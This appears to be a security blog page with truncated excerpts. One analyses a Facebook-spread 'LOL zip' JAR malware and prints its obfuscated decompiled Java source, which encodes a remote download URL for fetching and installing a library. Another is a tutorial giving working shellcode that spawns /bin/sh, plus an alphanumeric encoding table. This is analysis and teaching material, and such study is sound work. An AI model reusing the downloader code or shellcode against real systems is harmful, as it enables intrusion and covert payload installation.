aLt's Security Blog

As discussed in previous post now we will employ traditional malware analysis technique in order to dissect this new virus. Figure 2 show LOL zip virus message. Initially we have following information about this malware: ·          This message is sent from victim’s computer without his knowledge to all his Facebook friends and ·          Victims also reported sluggish performance of system after the infection. Fig. 2. Facebook Message containing Malware We will safely download this file on our virtual controlled environment to carry the further analysis. After unzipping it we found a JAR (Java Archived File) in it. Fig. 3. JAR file inside Zipped folder  Using online available java decompiler we have converted the byte code (JAR file) to source code file. Fig. 4. Decompiled Jar File   Decompilation and comprehension of JAR File Source of JAR file is obfuscated so it is needed to decompile such a file. We will use simple print instruct

 If recently  you have received a message like the one shown below, lol and zip attached with it then please do not try to open the jar file inside it. So what this jar file contains?? Its a code that downloads the dynamic loadable library from internet and install it in system.Lets have a look at the source code of jar file which i decompiled . import java.io.File; import java.io.IOException; import java.io.InputStream; import java.io.PrintStream; import java.net.HttpURLConnection; import java.net.URI; import java.net.URL; import java.nio.file.CopyOption; import java.nio.file.Files; import java.nio.file.Paths; public class IMG_00111 {   public static String XJJXMWJJQDBIAEHVEBZ()   {     int[] arrayOfInt = { 104, 116, 116, 112, 115, 58, 47, 47, 100, 108, 46, 100, 114, 111, 112, 98, 111, 120, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 115, 47 };          StringBuilder localStringBuilder = new StringBuilder(arrayOfInt.length)

Writing Alphanumeric Shellcode Step1: First we will write assembly program to spawn a shell: Objdump of shellcode.s  SHELLCODE "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" Step2:  Now lets test this hex shellcode using a C program: C program to execute shellcode directly Shellcode Execution Step3: Convert instruction opcodes from hex to ascii using table given below: ASCII Shellcode Table ASCII Value Hex Opcode Assembly Equivalent 0 \x30 xor 1 \x31 xor 2 \x32 xor 3 \x33 xor 4 \x34 xor al, 0x## [byte] 5 \x35 xor eax, 0x######## [DWORD] 6 \x36 SS Segment Override 7 \x37 aaa 8 \x38 cmp 9 \x39 cmp  : \x3a cmp  ; \x3b cmp < \x3c cmp al, 0x## [byte] = \x3d cmp eax, 0x######## [DWORD] > \x3e [undocced nop]  ? \x3f aas @ \x40 inc eax A \x41 inc ecx B \x42 inc edx C \x43 inc ebx D \x44 inc esp E \x45 inc ebp F \x46 inc esi G \x47 inc